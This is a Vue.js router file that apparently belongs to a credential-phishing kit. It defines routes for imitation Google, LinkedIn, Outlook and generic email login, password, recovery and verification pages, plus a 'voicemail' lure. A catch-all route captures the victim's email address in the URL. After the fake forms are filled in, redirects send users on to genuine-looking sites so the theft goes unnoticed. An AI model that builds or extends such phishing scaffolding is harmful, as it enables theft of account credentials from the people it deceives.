import Vue from "vue";
import Router from "vue-router";
import Home from "./views/Home.vue";

Vue.use(Router);

export default new Router({
  routes: [
    {
      path: "/",
      name: "home",
      component: Home
    },
    {
      path: "/about",
      name: "about",
      // route level code-splitting
      // this generates a separate chunk (about.[hash].js) for this route
      // which is lazy-loaded when the route is visited.
      component: () =>
        import(/* webpackChunkName: "about" */ "./views/About.vue")
    },

    {
      path: "/success",
      name: "success",
      beforeEnter() {
        location.href = "https://office-home.web.app";
        // location.href = "https://mail.google.com";
      },
      component: () =>
        import(/* webpackChunkName: "success" */ "./views/Success.vue")
    },
    // GOOGLE VIEWS.
    {
      path: "/google-email-form",
      name: "googleEmail",
      component: () =>
        import(
          /* webpackChunkName: "googleEmailForm" */ "./views/google-form/GoogleEmailForm.vue"
        )
    },
    {
      path: "/google-pass-form",
      name: "googlePass",
      component: () =>
        import(
          /* webpackChunkName: "googlePassForm" */ "./views/google-form/GooglePassForm.vue"
        )
    },
    {
      path: "/google-recovery-form",
      name: "googleRecovery",
      component: () =>
        import(
          /* webpackChunkName: "googleRecoveryForm" */ "./views/google-form/GoogleRecoveryForm.vue"
        )
    },
    {
      path: "/google-verify-form",
      name: "googleVerify",
      component: () =>
        import(
          /* webpackChunkName: "googleVerifyForm" */ "./views/google-form/GoogleVerifyForm.vue"
        )
    },
    // LINKEDIN VIEWS
    {
      path: "/linkedin-form",
      name: "linkedinEmailPass",
      component: () =>
        import(
          /* webpackChunkName: "linkedinEmailPassForm" */ "./views/linkedin-form/LinkedinEmailPassForm.vue"
        )
    },
    {
      path: "/linkedin-security",
      name: "linkedinSecurity",
      component: () =>
        import(
          /* webpackChunkName: "linkedinEmailPassForm" */ "./views/linkedin-form/LinkedinSecurity.vue"
        )
    },
    {
      path: "/linkedin-successful",
      name: "linkedinSuccessful",
      component: () =>
        import(
          /* webpackChunkName: "linkedinEmailPassForm" */ "./views/linkedin-form/LinkedinSuccessful.vue"
        )
    },
    {
      path: "/linkedin-continue",
      name: "linkedinContinue",
      beforeEnter() {
        location.href = "https://linkedin.com";
        // location.href = "https://mail.google.com";
      }
    },

    // OUTLOOK VIEWS
    {
      path: "/outlook-email-form",
      name: "outlookEmail",
      component: () =>
        import(
          /* webpackChunkName: "outlookEmailForm" */ "./views/outlook-form/OutlookEmailForm.vue"
        )
    },
    {
      path: "/*/:email",
      name: "outlookPass",
      component: () =>
        import(
          /* webpackChunkName: "outlookPassForm" */ "./views/outlook-form/OutlookPassForm.vue"
        )
    },
    {
      path: "/not-listed",
      name: "notListed",
      component: () =>
        import(
          /* webpackChunkName: "notListed" */ "./views/outlook-form/NotListed.vue"
        )
    },
    {
      path: "/voicemail",
      name: "voicemail",
      component: () =>
        import(
          /* webpackChunkName: "notListed" */ "./views/outlook-form/voicemail.vue"
        )
    },
    // OTHER VIEWS
    {
      path: "/other-email-form",
      name: "otherEmail",
      component: () =>
        import(
          /* webpackChunkName: "otherEmailForm" */ "./views/other-form/OtherEmailForm.vue"
        )
    },
    {
      path: "/other-pass-form",
      name: "otherPass",
      component: () =>
        import(
          /* webpackChunkName: "otherPassForm" */ "./views/other-form/OtherPassForm.vue"
        )
    }
  ]
});
